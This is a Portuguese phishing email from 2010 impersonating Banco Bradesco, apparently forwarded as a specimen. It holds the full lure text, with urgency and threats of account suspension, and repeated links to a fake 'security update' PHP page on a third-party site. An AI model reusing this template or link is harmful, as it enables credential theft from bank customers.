From: Aviso <informacoes2...@bradesco.com.br>
Date: 2010/1/19
Subject: Modulo de Segurança Desativado

 *Banco Bradesco*
 Autenticação:*E68807*

  *Prezado(a) Cliente*

Verificamos que seu Cartão de Segurança encontra-se preste [?]a ser
desativado em nosso sistema, para sua segurança recomendamos seu
recadastramento.

 *Adesão de Segurança:* é uma solução que torna mais seguro as transações [?]que
você realiza no
auto-atendimento e da melhoria contínua nos processos de proteção e
privacidade ao cliente.

    *Sistema Operacional* *-* *Atualizado*

  *Aqui o link que vinha no "adesao de segurança":*
nardidesigns.com/zencart//images/bradesco.php?bra=bancobradesco
  *Adesão de Segurança*   Ativar
dispositivo<http://nardidesigns.com/zencart//images/bradesco.php?bra=bancobradesco>

    *Módulo de Segurança* *-*
*Desatualizado*<http://nardidesigns.com/zencart//images/bradesco.php?bra=bancobradesco>
*Plugin de Segurança* *-*
*Desatualizado*<http://nardidesigns.com/zencart//images/bradesco.php?bra=bancobradesco>

*Atenção:* Caso nao faça a sua Atualização com urgência, o acesso via
Caixas-Eletrônicos e Internet-Banking ficara suspenso e seu Cartão junto com
Chaves de Segurança serão cancelados, impossibilitando acessos e
movimentações.

 *© Banco Bradesco*

Esta mensagem é destinada exclusivamente para a(s) pessoa(s) a quem é
dirigida, [?]podendo conter informação confidencial e/ou legalmente
privilegiada. desde já fica notificado de abster-se a divulgar, copiar,
distribuir, examinar ou, de qualquer forma, utilizar a informação contida
nesta mensagem, por ser ilegal. Caso você tenha recebido esta mensagem por
engano, pedimos que nos retorne este E-Mail, promovendo, desde logo, a
eliminação do seu conteúdo em sua base de dados, registros ou sistema de
controle. Fica desprovida de eficácia e validade a mensagem que contiver
vínculos obrigacionais, expedida por quem não detenha poderes de
representação.[?]

--
(^_^)

“Um poeta faz sim a palavra da terra. Este é o seu ofício, e o
seu valor. Tanto quanto o meu é vadiar pela vida, meu
senhor. O poeta inventa, invade, conquista territórios para a
falagem da língua, que depois a gente ara, capina, aplaina,
lixa, esquece no sol, serra, desempena, usa. O povo é o
marceneiro da língua. Eu só sei fazer poesia com as pernas,
com o corpo. Capoeira.”

--
(^_^)

<<338.gif>>